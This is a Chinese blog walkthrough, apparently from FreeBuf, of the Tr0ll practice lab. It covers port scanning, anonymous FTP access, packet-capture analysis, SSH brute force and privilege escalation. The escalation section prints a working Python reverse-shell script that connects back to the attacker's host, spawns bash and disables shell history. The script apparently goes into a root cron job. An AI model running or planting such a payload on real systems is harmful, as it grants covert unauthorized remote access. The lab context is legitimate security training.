freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Tr0ll靶场复现
w9n3d 2024-04-10 16:53:59 125114

一、环境搭建

Kali攻击机IP地址:192.168.247.145

靶机IP地址:暂时未知

二、信息收集

1、Nmap获取靶机地址
image-20240410092158767.png

靶机地址为192.168.247.147


2、Nmap进行端口探测
image-20240410092337207.png

靶机开放了21、22、80端口,且允许默认账号Anonymous/Anonymous登录


3、目录扫描
image-20240410093033440.png

发现robots.txt中存在secret目录
  • 尝试访问web页面
    image-20240410094840433.png

未发现可利用的信息


4、指纹识别
image-20240410093129267.png

三、漏洞探测

尝试登陆ftp
image-20240410095417638.png


分析该流量包
image-20240410095550664.png

全局搜索字符串是否存在txt文件,发现secret_stuff.txt


不断点击find,发现secret_stuff.txt文件的ftp data
image-20240410100420498.png

该文件提示找到了sup3rs3cr3tdirlol


一开始还以为是哪个用户的密码,经过尝试发现是一个目录

image-20240410100659673.png

下载该文件并分析
image-20240410101031600.png

strings查找该文件的可打印字符串,提示找到地址0x0856BF


经过尝试发现也是一个目录
image-20240410101325770.png

打开第一个文件夹
image-20240410101413022.png

存在一堆字符,感觉是用户名


打开第二个文件夹
image-20240410101551684.png

发现Pass.txt,难不成这个就是密码?!


将第一个文件做成用户名字典,第二个文件做成密码,尝试爆破ssh
image-20240410102404382.png


emmm...失败了,通过查阅资料发现,是将文件名当作密码
image-20240410102515981.png

通过参数-p指定密码为Pass.txt,获得ssh的账号密码为overflow/Pass.txt

四、权限提升

登陆ssh
image-20240410102817877.png


查看系统信息
image-20240410102916415.png


搜索本地提权漏洞
image-20240410104810207.png


将文件复制到当前桌面目录
image-20240410105901000.png


利用python启用http简易服务传输文件

image-20240410110417124.png
image-20240410110358710.png


查看flag文件
image-20240410110447690.png

五、拓展与总结

登陆ssh后发现几分钟后shell就会断开,应该是配置了计划任务,查看计划任务
image-20240410143829383.png

*/2 * * * * cleaner.py
*/2:分钟字段,表示每分钟都执行一次。* 表示每分钟,/2 表示每个值(在这里是分钟)都执行一次。
*:小时字段,表示每小时都执行一次。* 表示每个小时。
*:日期字段,表示每天都执行一次。* 表示每个日期。
*:月份字段,表示每个月都执行一次。* 表示每个月。
*:星期字段,表示每周都执行一次。* 表示每个星期。
总结为分、时、日、月、周

脚本的作用是删除/tmp目录下的所有文件并退出程序


查看该文件的权限信息
image-20240410144301763.png


1、反弹shell(此处靶机修改了一下环境,ip变为192.168.247.148)

#!/usr/bin/python
def con():
	import socket, time,pty, os
	host='192.168.247.145'
	port=9999
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.settimeout(10)
	s.connect((host,port))
	os.dup2(s.fileno(),0)
	os.dup2(s.fileno(),1)
	os.dup2(s.fileno(),2)
	os.putenv("HISTFILE",'/dev/null')
	pty.spawn("/bin/bash")
	s.close()
con()

image-20240410145850717.png

image-20240410145916304.png


2、新增root可执行程序
image-20240410150827225.png

执行程序
image-20240410151030380.png


3、为overflow用户添加sudo权限
image-20240410152234740.png

image-20240410152241902.png

此次打靶涉及的知识点有常规的信息收集(端口、目录、指纹)、ftp匿名登录、流量分析、文件分析、hydra爆破以及多种提权方式等。

# 漏洞 # 渗透测试
本文为 w9n3d 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
w9n3d LV.4
这家伙太懒了,还未填写个人描述!
  • 7 文章数
  • 1 关注者
HNCTF-osint
2024-05-18
第一届 "帕鲁杯" - CTF挑战赛-Misc-350×350
2024-04-24
2024 第一届VCTF纳新赛-Misc-f0rensicmaster
2024-03-25
文章目录